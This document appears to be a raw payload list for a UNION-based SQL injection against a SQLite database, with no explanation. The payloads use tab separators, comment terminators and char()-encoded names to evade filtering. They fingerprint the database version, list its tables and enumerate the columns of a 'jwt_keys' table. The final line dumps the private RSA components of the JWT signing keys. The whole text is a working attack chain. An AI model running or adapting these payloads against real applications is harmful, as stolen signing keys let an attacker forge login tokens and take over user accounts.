'	UNION	SELECT	sqlite_version()/*
'	UNION	SELECT	name	FROM	sqlite_master	WHERE	type	LIKE	char(116,97,98,108,101)	LIMIT	1/*
'	UNION	SELECT	name	FROM	PRAGMA_TABLE_INFO(char(106,119,116,95,107,101,121,115))	LIMIT	1	OFFSET	0/*
'	UNION	SELECT	name	FROM	PRAGMA_TABLE_INFO(char(106,119,116,95,107,101,121,115))	LIMIT	1	OFFSET	1/*
'	UNION	SELECT	name	FROM	PRAGMA_TABLE_INFO(char(106,119,116,95,107,101,121,115))	LIMIT	1	OFFSET	2/*
'	UNION	SELECT	name	FROM	PRAGMA_TABLE_INFO(char(106,119,116,95,107,101,121,115))	LIMIT	1	OFFSET	3/*
'	UNION	SELECT	name	FROM	PRAGMA_TABLE_INFO(char(106,119,116,95,107,101,121,115))	LIMIT	1	OFFSET	4/*
'	UNION	SELECT	name	FROM	PRAGMA_TABLE_INFO(char(106,119,116,95,107,101,121,115))	LIMIT	1	OFFSET	5/*
'	UNION	SELECT	name	FROM	PRAGMA_TABLE_INFO(char(106,119,116,95,107,101,121,115))	LIMIT	1	OFFSET	6/*
'	UNION	SELECT	name	FROM	PRAGMA_TABLE_INFO(char(106,119,116,95,107,101,121,115))	LIMIT	1	OFFSET	7/*
'	UNION	SELECT	name	FROM	PRAGMA_TABLE_INFO(char(106,119,116,95,107,101,121,115))	LIMIT	1	OFFSET	8/*
'	UNION	SELECT	name	FROM	PRAGMA_TABLE_INFO(char(106,119,116,95,107,101,121,115))	LIMIT	1	OFFSET	9/*
'	UNION	SELECT	name	FROM	PRAGMA_TABLE_INFO(char(106,119,116,95,107,101,121,115))	LIMIT	1	OFFSET	10/*
'	UNION	SELECT	CONCAT_WS(char(124),id,kid,kty,d,dp,dq,e,n,p,q,qi)	FROM	jwt_keys	LIMIT	1	OFFSET	0/*